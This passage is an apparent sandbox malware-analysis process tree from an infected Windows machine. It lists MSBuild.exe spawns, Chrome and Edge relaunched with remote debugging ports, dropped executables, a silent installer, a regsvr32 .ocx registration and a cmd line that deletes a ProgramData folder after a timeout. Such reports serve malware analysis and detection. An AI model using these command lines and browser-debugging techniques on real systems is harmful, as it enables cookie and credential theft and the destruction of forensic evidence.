      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:3192
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:5852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:5812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff97875dcf8,0x7ff97875dd04,0x7ff97875dd10
        8⤵
        
        PID:3744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1980,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1976 /prefetch:2
        8⤵
        
        PID:6088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2308 /prefetch:3
        8⤵
        
        PID:2848
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2788 /prefetch:8
        8⤵
        
        PID:3692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3260,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4284 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:5288
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4632 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5164,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5172 /prefetch:8
        8⤵
        
        PID:4984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5504 /prefetch:8
        8⤵
        
        PID:5044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5200,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3804 /prefetch:8
        8⤵
        
        PID:3036
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5628,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4252 /prefetch:8
        8⤵
        
        PID:4632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5876 /prefetch:8
        8⤵
        
        PID:5900
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6016,i,15864172083717494597,12111281488743882895,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6024 /prefetch:8
        8⤵
        
        PID:4560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        
        PID:4700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x214,0x240,0x244,0x220,0x2f8,0x7ff97873f208,0x7ff97873f214,0x7ff97873f220
        8⤵
        
        PID:4472
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1752,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:3
        8⤵
        
        PID:4896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2424,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:2
        8⤵
        
        PID:5792
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1892,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=3056 /prefetch:8
        8⤵
        
        PID:1700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=3652 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2864
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4144,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=4332 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4160,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:2
        8⤵
        Uses browser remote debugging
        
        PID:5912
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4596,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:8
        8⤵
        
        PID:4164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5256,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=5012 /prefetch:8
        8⤵
        
        PID:1912
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4472,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=5496 /prefetch:8
        8⤵
        
        PID:3200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4492,i,999593608901686655,6380654872096092999,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:8
        8⤵
        
        PID:4540
        
        C:\ProgramData\srq9hlxlfc.exe
        
        "C:\ProgramData\srq9hlxlfc.exe"
        7⤵
        
        PID:10828
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:10940
        
        C:\ProgramData\jecjec2nyu.exe
        
        "C:\ProgramData\jecjec2nyu.exe"
        7⤵
        
        PID:9156
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:9664
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:19568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x11c,0x120,0x124,0x118,0xf4,0x7ff973c3dcf8,0x7ff973c3dd04,0x7ff973c3dd10
        10⤵
        
        PID:19620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=2072 /prefetch:2
        10⤵
        
        PID:19980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
        10⤵
        
        PID:19988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2268,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=2376 /prefetch:8
        10⤵
        
        PID:20004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3260,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:20160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=3308 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:20168
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4268,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:2
        10⤵
        Uses browser remote debugging
        
        PID:20264
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3240,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=4632 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:20440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4904,i,6344804004278535872,17869868537796023831,262144 --variations-seed-version --mojo-platform-channel-handle=4908 /prefetch:8
        10⤵
        
        PID:18012
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:18860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:18880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x204,0x2a8,0x7ff97a39f208,0x7ff97a39f214,0x7ff97a39f220
        11⤵
        
        PID:18932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1976,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=1940 /prefetch:3
        11⤵
        
        PID:25164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1972,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=1968 /prefetch:2
        11⤵
        
        PID:25172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2400,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=2484 /prefetch:8
        11⤵
        
        PID:25320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:20344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:20364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4180,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:20372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4216,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:24816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:8
        11⤵
        
        PID:25392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5216,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:8
        11⤵
        
        PID:25388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4960,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=4980 /prefetch:8
        11⤵
        
        PID:24896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4948,i,16851326972045392611,16975000608367596550,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:8
        11⤵
        
        PID:6340
        
        C:\ProgramData\as268yukfu.exe
        
        "C:\ProgramData\as268yukfu.exe"
        7⤵
        
        PID:11212
        
        C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\odaesN9fih4AcIOI.exe
        
        C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\odaesN9fih4AcIOI.exe 0
        8⤵
        
        PID:11320
        
        C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\Ygvvg1NgfIIKUmj5.exe
        
        C:\Users\Admin\AppData\Local\Temp\JEbc9D3q\Ygvvg1NgfIIKUmj5.exe 11320
        9⤵
        
        PID:11624
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11624 -s 980
        10⤵
        Program crash
        
        PID:18136
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11320 -s 960
        9⤵
        Program crash
        
        PID:18108
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2vs0h" & exit
        7⤵
        
        PID:19680
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        Delays execution with timeout.exe
        
        PID:20460
    - - C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        5⤵
        
        PID:3208
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:4540
    - - C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        5⤵
        
        PID:5372
      - C:\Users\Admin\AppData\Local\Temp\is-01H78.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-01H78.tmp\Bell_Setup16.tmp" /SL5="$4026A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        6⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        7⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\is-9S9DC.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9S9DC.tmp\Bell_Setup16.tmp" /SL5="$50264,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        8⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        9⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
